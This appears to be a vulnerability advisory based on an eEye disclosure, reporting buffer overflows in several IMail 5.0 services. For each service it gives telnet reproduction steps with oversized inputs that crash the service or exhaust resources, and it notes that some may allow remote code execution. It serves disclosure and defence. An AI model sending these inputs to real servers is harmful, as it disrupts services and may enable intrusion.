Vulnerability

    Multiple IMail Vulnerabilites

Affected

    IMail 5.0

Description

    Following is based  on eEye Digital  Security Team Advisory.   The
    following holes  can be  used as  a Denial  of Service against the
    various  services  mentioned  and  in  some cases used to remotely
    execute code.

    Imapd (143)
    ===========
    The imapd  login process  does not  do proper  bounds checking  on
    usernames and passwords.

        * OK IMAP4 Server (IMail 4.06)
        X LOGIN glob1 glob2

    Where glob1 is 1200 characters and glob2 is 1300 characters.   The
    imapd service will crash with the usuall overflow error.

    LDAP (389)
    ==========

        Telnet to server.com 389
        Send: Y glob1
        hit enter twice
        Server Returns: 0
        Send: Y glob2
        hit enter

    Where glob1 and glob2  are 2375 characters and  Y is Y.   The ldap
    service goes to 90 percent or so and idles there.  Therefore using
    up most system resources.

    IMonitor (8181)
    ===============

        Telnet to server.com 8181
        Send: glob1
        hit enter twice

    Where glob1 is 2045 characters.  The IMonitor service crashes with
    the normal overflow message.

    IMail Web Service (8383)
    ========================

        Telnet to server.com 8383
        Send: GET /glob1/

    Where glob1 is 3000 characters.   The usual overflow message  will
    be displayed.  This one looks to be easily exploitable.

    Whois32 Daemon (43)
    ===================

        Telnet to server.com 43
        Send glob1

    Where glob1 is 1000 characters.   The usual overflow message  will
    be displayed.  Ya... starting to sound old.

Solution

    Vendor has been notified, Waiting for response...